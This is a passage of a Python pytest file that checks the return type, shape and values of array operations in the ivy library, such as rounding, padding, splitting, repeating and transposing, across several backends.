"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# floor
@pytest.mark.parametrize(
"x_n_x_floored", [(2.5, 2.), ([10.7], [10.]), ([[3.8, 2.2], [1.7, 0.2]], [[3., 2.], [1., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floor(x_n_x_floored, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_floored[0], Number) or isinstance(x_n_x_floored[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_floored[0], dtype, dev)
ret = ivy.floor(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floor, x), np.array(x_n_x_floored[1]))
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# abs
@pytest.mark.parametrize(
"x_n_x_absed", [(-2.5, 2.5), ([-10.7], [10.7]), ([[-3.8, 2.2], [1.7, -0.2]], [[3.8, 2.2], [1.7, 0.2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_abs(x_n_x_absed, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_absed[0], Number) or isinstance(x_n_x_absed[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_absed[0], dtype, dev)
ret = ivy.abs(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.abs, x), np.array(x_n_x_absed[1]))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argmin
@pytest.mark.parametrize(
"x_n_axis_x_argmin", [([-0.3, 0.1], None, [0]), ([[1.3, 2.6], [2.3, 2.5]], 0, [0, 1]),
([[1.3, 2.6], [2.3, 2.5]], 1, [0, 0])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_argmin(x_n_axis_x_argmin, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x_n_axis_x_argmin[0], dtype, dev)
axis = x_n_axis_x_argmin[1]
ret = ivy.argmin(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert tuple(ret.shape) == (len(x.shape),)
# value test
assert np.allclose(call(ivy.argmin, x, axis), np.array(x_n_axis_x_argmin[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# concatenate
@pytest.mark.parametrize(
"x1_n_x2_n_axis", [(1, 10, 0), ([[0., 1., 2.]], [[1., 2., 3.]], 0), ([[0., 1., 2.]], [[1., 2., 3.]], 1),
([[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_concatenate(x1_n_x2_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x1, x2, axis = x1_n_x2_n_axis
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.concatenate((x1, x2), axis)
# type test
assert ivy.is_array(ret)
# cardinality test
axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
if x1.shape == ():
expected_shape = (2,)
else:
expected_shape = tuple([item * 2 if i == axis_val else item for i, item in enumerate(x1.shape)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.concatenate, [x1, x2], axis),
np.asarray(ivy.functional.backends.numpy.concatenate([ivy.to_numpy(x1), ivy.to_numpy(x2)], axis)))
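# Shape bookkeeping for the concatenate test above, as a short illustration:
# two (1, 3) inputs joined along axis 0 give a (2, 3) result, while joining
# them along axis 1 gives (1, 6) -- only the concatenation axis doubles, which
# is exactly what the expected_shape comprehension encodes.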
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# stack
# @pytest.mark.parametrize(
# "xs_n_axis", [((1, 0), -1), (([[0., 1., 2.]], [[3., 4., 5.]]), 0), (([[0., 1., 2.]], [[3., 4., 5.]]), 1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_stack(xs_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# (x1, x2), axis = xs_n_axis
# if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x1 = tensor_fn(x1, dtype, dev)
# x2 = tensor_fn(x2, dtype, dev)
# ret = ivy.stack((x1, x2), axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# axis_val = (axis % len(x1.shape) if (axis is not None and len(x1.shape) != 0) else len(x1.shape) - 1)
# if x1.shape == ():
# expected_shape = (2,)
# else:
# expected_shape = list(x1.shape)
# expected_shape.insert(axis_val, 2)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.stack, (x1, x2), axis),
# np.asarray(ivy.functional.backends.numpy.stack((ivy.to_numpy(x1), ivy.to_numpy(x2)), axis)))
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
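# Worked example of the cardinality check above (values taken from the
# parametrisation): for x of shape (2, 3) split with num_or_size_splits=2
# along axis=1, the first chunk has math.ceil(3 / 2) == 2 columns, i.e.
# shape (2, 2); with num_or_size_splits=[2, 1] the first chunk likewise
# keeps num_or_size_splits[0] == 2 columns.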
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
# mxnet only supports repeats defined as an int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
# mxnet only supports repeats defined as an int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
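# Shape sketch for the non-scalar repeat case above: x of shape (1, 4)
# repeated with reps (2, 1, 0, 3) along axis -1 yields sum(reps) == 6
# elements on that axis, so the expected shape is [1, 6].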
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
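# Quick illustration of the zero_pad cardinality check: padding x of shape
# (1, 4) with pw = [[0, 1], [1, 2]] adds 0 + 1 rows and 1 + 2 columns,
# giving an output shape of (2, 7), matching the expected_shape comprehension.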
# fourier_encode
# @pytest.mark.parametrize(
# "x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
# 3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
# ([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
# [[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
# -8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
# -6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
# 1.0000000e+00]],
# [[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
# -2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
# -1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
# 1.0000000e+00]],
# [[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
# -6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
# -1.0000000e+00],
# [6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
# -3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
# 1.0000000e+00]]])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# # smoke test
# x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# if isinstance(max_freq, list):
# max_freq = tensor_fn(max_freq, dtype, dev)
# ret = ivy.fourier_encode(x, max_freq, num_bands)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# x_shape = [1] if x.shape == () else list(x.shape)
# expected_shape = x_shape + [1 + 2*num_bands]
# assert list(ret.shape) == expected_shape
# # value test
# assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# expand_dims
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.expand_dims(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# expected_shape = list(x.shape)
# expected_shape.insert(axis, 1)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
